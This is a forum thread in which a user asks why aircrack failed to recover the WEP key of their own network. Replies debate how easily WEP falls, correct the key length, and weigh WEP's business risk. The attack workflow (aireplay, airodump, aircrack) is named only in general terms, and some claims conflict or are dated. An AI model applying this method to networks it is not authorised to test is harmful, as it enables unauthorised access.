Why can't I crack my own WEP key?

[imported_spinoza]

I downloaded a version of Backtrack (a Linux Live CD that contains all kinds of hacking tools) and decided to try it out against my own wireless network. My network is secured via 128-bit WEP.

I only have one machine (a laptop), so I used aireplay to generate ARP traffic and IVs. I also used airodump to capture this self-created traffic. After collecting over four million packets, I ran aircrack to see whether it would return my network's wireless key. It churned and churned (for over an hour), but it never got the key. Is cracking 128-bit WEP harder than people say it is? Why didn't my little exercise work?

 

[JackMDS]

Cause the ease of cracking is greatly exaggerated.

There was a movie with Nicholas Cage in which a gang stole very fancy cars in 30sec. each.

Same with WEP cracking, good for the movies, and some super crackers that make a living of security issues.

 

[p0lar]

Originally posted by: JackMDS
Cause the ease of cracking is greatly exaggerated.

There was a movie with Nicholas Cage in which a gang stole very fancy cars in 30sec. each.

Same with WEP cracking, good for the movies, and some super crackers that make a living of security issues.

It can be done in less than 2 minutes with significantly fewer packets; however, it's a matter of probability.

OP: Do you really understand the theory behind WEP key cracking?

 

[imported_spinoza]

Originally posted by: p0lar


OP: Do you really understand the theory behind WEP key cracking?

Yes, it relies on weak IVs. I collected plenty of IVs from my own network, but I still wasn't able to crack the key. Do you have any idea why this might be?

 

[p0lar]

Originally posted by: spinoza
Yes, it relies on weak IVs. I collected plenty of IVs from my own network, but I still wasn't able to crack the key. Do you have any idea why this might be?

There exists a limit of packet capture beyond which it takes exponential orders of packets to make significant progress against the RC4 cipher.

How many passes have you made by collecting new subsets of data?

i.e. First round you collect 1M packets, process them, and get no result...

wash, rinse, repeat.

Originally posted by: p0lar
it's a matter of probability

 

[JackMDS]

Originally posted by: p0lar

It can be done in less than 2 minutes with significantly fewer packets; however, it's a matter of probability.

This a self negating statement; if it is matter of probability then you cannot state that it can be done in two minutes.:shocked:

 

[SoulAssassin]

Originally posted by: JackMDS

Originally posted by: p0lar

It can be done in less than 2 minutes with significantly fewer packets; however, it's a matter of probability.

This a self negating statement; if it is matter of probability then you cannot state that it can be done in two minutes.:shocked:

Not necessarily...I think he's saying given a choice of 0-x numbers it's possible to guess a chosen number in two minutes. It's also possible to guess it on the first try, it's also possible to guess it on the last possible option, two minutes is just a possible time it could take.

 

[JackMDS]

Contrary to what Politician do, building a sentence that makes sense language wise does mean that it is tangible Reality.

You can say that there is a 0.00004% probability to brake WEP in 2 minutes. Alternatively, you can say that you actually try to break 10 WEP ciphers and it took you average of 10 days per cipher. But you can not declare a definite number out of generak probability because two minutes is just as good as 2 sec. or 200 years.

WEP is Not secure as WPA and numerous time professional hackers broke it.

However, the regular M.O. on the Net is taking info and blows it out of proporation thriving on the topic related ignorance of many people.

The way it portrays is that any one can decipher in short period any WEP.

It is kind of being afraid to own a car because there is certain probability that it would get stolen.

 

[p0lar]

Originally posted by: JackMDS
Contrary to what Politician do, building a sentence that makes sense language wise does mean that it is tangible Reality.

<snipped>

The way it portrays is that any one can decipher in short period any WEP.

I n f o r m a t i o n .

I believe these algorithms have been implemented in one of the beta versions of aircrack-ng.

 

[spidey07]

fyi - what we call "128 bit WP" is actually a 104 bit key.

Eitherway, it can be broken very quickly. Minutes or less.

 

[p0lar]

Originally posted by: spidey07
fyi - what we call "128 bit WP" is actually a 104 bit key.

Eitherway, it can be broken very quickly. Minutes or less.

Totally my misunderstanding! (shame) Regardless, the theory stands and at worst it is an interesting read!

edit: misinformation removed -- thanks Spidey.

 

[spidey07]

Which brings up the question? Why is WEP so prevalent?

Because a huge TON of wireless networks were implemented before WPA. Along with those wireless deployments are the clients (handhelds, terminals, non-laptop type clients).

You tell somebody with 1000s of WEP clients that they need to replace them all. WEP is an acceptible risk.

 

[Oakenfold]

Originally posted by: spidey07
Which brings up the question? Why is WEP so prevalent?

Because a huge TON of wireless networks were implemented before WPA. Along with those wireless deployments are the clients (handhelds, terminals, non-laptop type clients).

You tell somebody with 1000s of WEP clients that they need to replace them all. WEP is an acceptible risk.

I"m not certain I would go as far as saying WEP is an acceptable risk. For home use it might be however for business use there are increasing risks that are not present in the home. Depending on the nature of the business, and the type of traffic running across that network the cost of one security breach could be significant.

Granted not every business is going to run out and start running the latest encryption scheme, hopefully management has carefully considered the risks involved and ultimately if WEP is acceptable at the time to the entity.

 

[p0lar]

Originally posted by: Oakenfold
I"m not certain I would go as far as saying WEP is an acceptable risk. For home use it might be however for business use there are increasing risks that are not present in the home. Depending on the nature of the business, and the type of traffic running across that network the cost of one security breach could be significant.

Granted not every business is going to run out and start running the latest encryption scheme, hopefully management has carefully considered the risks involved and ultimately if WEP is acceptable at the time to the entity.

I'm mostly in agreement. I use WEP at home, but then run an IPSEC connection from my laptop to the OpenBSD firewall on the other side of the WEP and tunnel my way out. Mostly, it's an exercise in interest to see if someone actually will take the time to do anything with it. I've got a few specific PF rules that catch and log non-IPSEC traffic and thus far, I've not gotten any alerts outside of my own piddling or forgetfulness. I think, by and large, for home use, it may not be ideal but it's not going to make or break your security fortress. I can think of at least a dozen other horrible habits people have that supersede the dangers of WEP vs. WPA. (i.e. not checking security certificates for SSL sites before making online purchases) Still, the cost of a new router or access-point at home is nearly moot.. I'm hoping that all the goons that believe MIMO and/or WiMax is going to revolutionize wireless will drive down the price on good 802.11a/b/g access-points so the rest of us can catch a price break.. but that's OT and a discussion for another day/thread.

Just for a good chuckle on the dangers of businesses failing to realize the potential for compromise... though WEP really isn't to blame for the whole of it...

 

[Genx87]

An amazing story when you think about it. In big organizations things move very slow like the govt. I was in the corp HQ of a division of a fortune 250 company. In 2005 when I was leaving, they were just getting done with their wireless project, that was using WEP keys and a radius server as security.